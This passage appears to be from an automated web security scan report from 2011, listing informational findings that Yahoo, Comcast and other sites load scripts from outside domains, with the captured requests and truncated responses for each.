P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Cache-Control: private
Content-Type: text/html;charset=utf-8
X-Cache: MISS from new.music.yahoo.com
Connection: close
Content-Length: 103483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script>
rtTop = Number(new Date());
</script>
<script type="text/javascript" src="http://l.yimg.com/p/js/compressed/music_global_top_1.11.0.js"></script>
...[SNIP]...
</style>
<script type="text/javascript" language="javascript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/flash/swfobject/1.0/swfobject.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/p/combo?music/d/js/blogs/1314018371/mini/yahoo.music.blogs.js&music/d/js/1314018381/mini/webplayerloader-onsite-min.js"></script>

<script type="text/javascript" src="http://us.js.yimg.com/lib/media/phugc/mwphcom_min_2.5.9.js"></script>

<script type="text/javascript" src="http://l.yimg.com/p/js/compressed/music_global_bottom_1.13.0.js"></script>
...[SNIP]...

16.31. http://omg.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 70391

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

   
   <title>omg! Celebrity gossip, news, photos, babies, couples, hotties, and more - omg! on Ya
...[SNIP]...
</script><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</noscript><script type="text/javascript"src="http://l.yimg.com/d/lib/rt/rto1_78.js"></script>
...[SNIP]...
<!--QYZ ,;;;2115806991;;-->                
               
<script language="javascript" src="http://l.yimg.com/a/combo?omg/js/omg-main-2.1.1.js&omg/js/menu-1.1.0.js&omg/js/deferloader-1.0.0.js"></script>
...[SNIP]...

16.32. http://pro.tweetmeme.com/button.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pro.tweetmeme.com
Path:   /button.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /button.js?url=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&style=compact&service=bit.ly&t_sec=mit_share&t_act=retweet HTTP/1.1
Host: pro.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 06 Sep 2011 12:49:45 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Url-Lookup: OrAdd (156)
X-Pro-Served-In: 0.0025007724761963
X-Served-By: h00
Content-Length: 6589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <meta content="tex
...[SNIP]...
</style>

<script type="text/javascript" src="http://l.yimg.com/d/combo?yui/3.1.1/build/yui/yui-min.js&amp;ult/ylc_1.9.js"></script>
...[SNIP]...

16.33. http://realestate.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 71991

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Yahoo! Real Estate - Homes for Sale, Houses for Sale & Real Estate</
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&d/lib/yui/2.5.2/build/container/container-min.js&qf/static/js/4.3.21/overlay-201105050424.js&qf/static/js/4.3.21/ult-strip-201105050424.js&d/lib/uh/15/js/uh_rsa-1.0.9.js&qf/static/js/4.3.21/header-201105050424.js&d/lib/yui/2.5.2/build/connection/connection-min.js&d/lib/yui/2.5.2/build/autocomplete/autocomplete-min.js&qf/static/js/4.3.21/homepage-201105050424.js&qf/static/js/4.3.21/global-201105050424.js"></script>
...[SNIP]...

16.34. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /search/New_York/New_York/homes-for-sale

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 173778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>10010 Real Estate & Homes for Sale, 10010 Houses - Yahoo! Real Estate</titl
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&d/lib/yui/2.5.2/build/container/container-min.js&qf/static/js/4.3.21/overlay-201105050424.js&qf/static/js/4.3.21/ult-strip-201105050424.js&d/lib/yui/2.5.2/build/connection/connection-min.js&d/lib/yui/2.5.2/build/cookie/cookie-beta-min.js&d/lib/yui/2.5.2/build/json/json-min.js&qf/static/js/4.3.21/util-201105050424.js&d/lib/yui/2.5.2/build/get/get-min.js&d/lib/yui/2.5.2/build/history/history-min.js&qf/static/js/4.3.21/mvc-201105050424.js&qf/static/js/4.3.21/srp-mvc-201105050424.js&qf/static/js/4.3.21/class-cycler-201105050424.js&d/lib/yui/2.5.2/build/dragdrop/dragdrop-min.js&d/lib/yui/2.5.2/build/animation/animation-min.js&d/lib/yui/2.5.2/build/slider/slider-min.js&qf/static/js/4.3.21/slider-201105050424.js&qf/static/js/4.3.21/rb-en-201105050424.js&d/lib/ult/ylc_1.9.js&qf/static/js/4.3.21/popup-201105050424.js&qf/static/js/4.3.21/header-201105050424.js&qf/static/js/4.3.21/location-srp-focus-201105050424.js&d/lib/uh/15/js/uh_rsa-1.0.9.js&d/lib/yui/2.5.2/build/autocomplete/autocomplete-min.js&qf/static/js/4.3.21/autocomplete-201105050424.js&qf/static/js/4.3.21/srp-saved-search-list-201105050424.js&qf/static/js/4.3.21/srp-save-search-201105050424.js&qf/static/js/4.3.21/srp-pagination-201105050424.js&qf/static/js/4.3.21/srp-refine-form-201105050424.js&qf/static/js/4.3.21/srp-map-toggler-201105050424.js&qf/static/js/4.3.21/srp-view-toggler-201105050424.js&qf/static/js/4.3.21/imageloader-201105050424.js&qf/static/js/4.3.21/srp-imageloader-201105050424.js&qf/static/js/4.3.21/srp-listing-201105050424.js&qf/static/js/4.3.21/srp-sort-control-201105050424.js&qf/static/js/4.3.21/ult-ylc-201105050424.js&qf/static/js/4.3.29/listing-ad-201105300129.js"></script>
...[SNIP]...

16.35. http://servicetips.whitefence.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servicetips.whitefence.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: servicetips.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "30ba8e6c26260d3f6ada8f96392cdebac6dc9072"
Server: TornadoServer/0.1
Content-Length: 25838
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 11:59:34 GMT
Connection: close

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8" />
   <meta name="wa_lr" scheme="DMINSTR2" content="en-US" />
   <meta name="wa_lid" scheme="DMI
...[SNIP]...
<![endif]-->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- Omniture -->
   <script src="http://external.dmtracker.com/tags/vs.js"></script>
...[SNIP]...

16.36. http://shopping.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: shopping.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:06 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 71878


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/rese
...[SNIP]...
</script>
<script src="http://l.yimg.com/us.js.yimg.com/lib/yui/3.2.0/build/yui/yui-min.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --> <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- #postdoc -->

<script type="text/javascript" src="http://l.yimg.com/a/combo?yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&yui/2.7.0/build/imageloader/imageloader-min.js&shop/s2/sh_global_201002251741.js"></script>
...[SNIP]...

16.37. http://shopping.yahoo.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search;_ylt=ApMQLGDYOT7QlJIA.L4LcHMEgFoB?p=xss+phone&did=0 HTTP/1.1
Host: shopping.yahoo.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 86025


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/rese
...[SNIP]...
</script>
<script src="http://l.yimg.com/us.js.yimg.com/lib/yui/3.2.0/build/yui/yui-min.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --> <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ono/ywa.js"></script>
...[SNIP]...
<!-- #postdoc -->

<script type="text/javascript" src="http://l.yimg.com/a/combo?yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&yui/2.7.0/build/imageloader/imageloader-min.js&shop/s2/sh_global_201002251741.js&shop/s2/sh_listing_201010132254.js"></script>
...[SNIP]...

16.38. http://sitesearch.comcast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:11 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18478
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom"></script>
...[SNIP]...

16.39. http://sports.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxid=016e3b4e6615bdb5; YWP_VOLUME=0.5; spt_site=scorethin_league=nascar; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:08 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: keep-alive
Via: HTTP/1.1 r2.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 143040

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Yahoo! Sports - Sports News, Scores, Rumors, Fantasy Games, and more</title>
<meta h
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
<!-- APT Vendor: Doubleclick -->
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTEwNjlqYihnaWQkbkUxaDhVUERsQl9QQllwOVRtWVdpQU5ITWhkN2FrNW1Gb2dBRDBFcSxzdCQxMzE1MzEzMjg5MDQ4MDk5LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJFJrTDVBRVBEbUt3LSxjdCQyNSx5YngkRk5vNlNOWjdBcC5WU0pwRk04TFZ0dyxyJDAscmQkMTZpbmZpODlwKSk/1/*http://global.ard.yahoo.com/SIG=15k06i807/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=Akopd_SvIN1lB31F8aANhAQ5nYcB/Y=YAHOO/EXP=1315320489/L=nE1h8UPDlB_PBYp9TmYWiANHMhd7ak5mFogAD0Eq/B=RkL5AEPDmKw-/J=1315313289124929/K=Fw3L9uhiwVsimoBmj_TrQg/A=3672358318799275418/R=0/X=6/*;ord=1315313289.124929?"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...

16.40. http://sports.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r5.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 142465

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Yahoo! Sports - Sports News, Scores, Rumors, Fantasy Games, and more</title>
<meta h
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flash9/misc_9as2_20081114.js"></script>
...[SNIP]...
<!-- APT Vendor: Doubleclick -->
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWE0MWhzMChnaWQkTml2R01tS0lQRTdwQVJwalRsLndqUUZjTWhkN2FrNW1GZFVBQ0NoTSxzdCQxMzE1MzEzMTA5NjA3MTA0LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJEVrUlZYVVBEbUswLSxjdCQyNSx5YngkNW1YdjU1YkhqWURLRTlCTFlxN3hiQSxyJDAscmQkMTZpczV1ZWFrKSk/1/*http://global.ard.yahoo.com/SIG=15ksi437m/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320309/L=NivGMmKIPE7pARpjTl.wjQFcMhd7ak5mFdUACChM/B=EkRVXUPDmK0-/J=1315313109676703/K=Q.Og7BX4QADGwPLFVDWSpw/A=3672358318799275418/R=0/X=6/*;ord=1315313109.676703?"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...

16.41. http://sports.yahoo.com/mlb/recap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /mlb/recap

Issue detail

The response dynamically includes the following scripts from other domains:

Request

